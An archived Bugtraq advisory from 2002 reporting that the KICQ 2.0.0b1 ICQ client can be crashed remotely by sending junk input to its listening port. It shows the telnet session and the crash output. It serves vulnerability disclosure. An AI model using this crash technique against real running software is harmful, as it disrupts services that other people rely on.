Bugtraq mailing list archives

KICQ 2.0.0b1 can be remotely crashed

From: _kiss_ () guay com
Date: Fri, 1 Feb 2002 23:10:14 +0100 (CET)

KICQ is an ICQ client, specifically designed for the KDE.

Versions affected:

    KICQ 2.0.0b1 using icqlib 1.0.0

Description

KICQ can be remotely crashed in a very simple way. Just telnet the machine on wich KICQ is running on the port it's
bound and feed some garbage.

        bash-2.05$ telnet 10.0.0.1 1030
        Trying 10.0.0.1...
        Connected to 10.0.0.1.
        Escape character is '^]'.
        garbage
        Connection closed by foreign host.

KDE Crash handler window appears and something like this goes in the console:

   KCrash: crashing.... crashRecursionCounter = 2
   KCrash: Application Name = kicq path = <unknown>

I have tried to find where in the code the error ocurrs, but the exact place seems to change every time I execute KICQ.

Solution

I have contacted the developers and hope a patch is released soon.

More information: sourceforge.net/projects/kicq

                Rafael San Miguel Carrasco (_kiss_)
                rsanmcar () alum uax es